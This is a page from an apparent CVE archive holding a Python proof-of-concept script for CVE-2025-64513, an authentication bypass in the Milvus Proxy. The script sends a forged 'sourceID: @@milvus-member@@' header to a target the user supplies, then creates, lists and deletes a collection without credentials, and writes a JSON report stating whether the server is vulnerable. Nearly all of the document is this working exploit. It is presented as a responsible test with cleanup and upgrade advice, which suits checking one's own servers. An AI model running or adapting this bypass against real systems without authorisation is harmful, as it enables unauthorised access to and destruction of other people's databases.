4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-64513.py PY
#!/usr/bin/env python3
# ==============================================
# CVE-2025-64513 Responsible Test PoC + Report
# Author: Blackash "B1ack4sh"
# Target: Milvus Proxy[](http://host:19530)
# ==============================================

import requests
import json
import random
import string
import sys
import datetime
import base64
import urllib3

urllib3.disable_warnings()

# === CONFIG ===
URL = ""  # ← SET YOUR TARGET: http://milvus-proxy:19530
VERIFY_SSL = False
TIMEOUT = 10

# Generate unique test name
TEST_ID = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
COLLECTION_NAME = f"cve_2025_64513_test_{TEST_ID}"

# Headers for bypass
BYPASS_HEADER = {"sourceID": "@@milvus-member@@", "Content-Type": "application/json"}

# Report storage
REPORT = {
    "cve": "CVE-2025-64513",
    "timestamp": datetime.datetime.utcnow().isoformat() + "Z",
    "target": URL,
    "test_collection": COLLECTION_NAME,
    "steps": [],
    "vulnerable": False,
    "proof": {},
    "cleanup": False
}

def log_step(step, result=None):
    entry = {"step": step, "result": result}
    REPORT["steps"].append(entry)
    print(f"[*] {step} → {result}")

def save_report():
    filename = f"report_cve_2025_64513_{TEST_ID}.json"
    with open(filename, "w") as f:
        json.dump(REPORT, f, indent=2)
    print(f"\nREPORT SAVED: {filename}\n")

# === STEP 1: Check Version (Read-Only) ===
def check_version():
    try:
        resp = requests.get(f"{URL}/api/v1/version", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT)
        if resp.status_code == 200:
            version = resp.json().get("version", "unknown")
            log_step("Version Check", f"Success (v{version})")
            return version
        else:
            log_step("Version Check", f"Failed (HTTP {resp.status_code})")
            return None
    except Exception as e:
        log_step("Version Check", f"Error: {e}")
        return None

# === STEP 2: Create Test Collection ===
def create_test_collection():
    payload = {
        "collection_name": COLLECTION_NAME,
        "schema": {
            "fields": [
                {"name": "id", "type": "Int64", "is_primary_key": True},
                {"name": "vector", "type": "FloatVector", "params": {"dim": 8}}
            ]
        }
    }
    try:
        resp = requests.post(f"{URL}/api/v1/collections", json=payload, headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT)
        if resp.status_code == 200:
            log_step("Create Test Collection", f"Success: {COLLECTION_NAME}")
            REPORT["proof"]["collection_created"] = True
            return True
        else:
            log_step("Create Test Collection", f"Failed: {resp.text}")
            return False
    except Exception as e:
        log_step("Create Test Collection", f"Error: {e}")
        return False

# === STEP 3: Verify Collection Exists ===
def verify_collection():
    try:
        resp = requests.get(f"{URL}/api/v1/collections", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT)
        if resp.status_code == 200:
            collections = [c["collection_name"] for c in resp.json().get("collections", [])]
            if COLLECTION_NAME in collections:
                log_step("Verify Collection", f"Found: {COLLECTION_NAME}")
                return True
        log_step("Verify Collection", "Not found")
        return False
    except Exception as e:
        log_step("Verify Collection", f"Error: {e}")
        return False

# === STEP 4: Clean Up ===
def delete_collection():
    try:
        resp = requests.delete(f"{URL}/api/v1/collections/{COLLECTION_NAME}", headers=BYPASS_HEADER, verify=VERIFY_SSL, timeout=TIMEOUT)
        if resp.status_code == 200:
            log_step("Cleanup", f"Deleted: {COLLECTION_NAME}")
            REPORT["cleanup"] = True
            return True
        else:
            log_step("Cleanup", f"Failed: {resp.text}")
            return False
    except Exception as e:
        log_step("Cleanup", f"Error: {e}")
        return False

# === MAIN ===
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc_cve_2025_64513.py http://milvus-host:19530")
        sys.exit(1)

    URL = sys.argv[1].rstrip("/")
    REPORT["target"] = URL

    print(f"\nTARGET: {URL}")
    print(f"TEST COLLECTION: {COLLECTION_NAME}\n")

    version = check_version()
    if not version:
        print("Version check failed. Likely not vulnerable or unreachable.")
        save_report()
        sys.exit(1)

    created = create_test_collection()
    verified = verify_collection() if created else False

    REPORT["vulnerable"] = created and verified
    REPORT["proof"]["version"] = version

    # Cleanup
    if created:
        delete_collection()
    else:
        print("Skipping cleanup (nothing created)")

    # Final Verdict
    print("\n" + "="*50)
    if REPORT["vulnerable"]:
        print("VULNERABLE TO CVE-2025-64513")
        print("Upgrade to 2.4.24 / 2.5.21 / 2.6.5 IMMEDIATELY!")
    else:
        print("NOT VULNERABLE (or already patched)")
    print("="*50)

    save_report()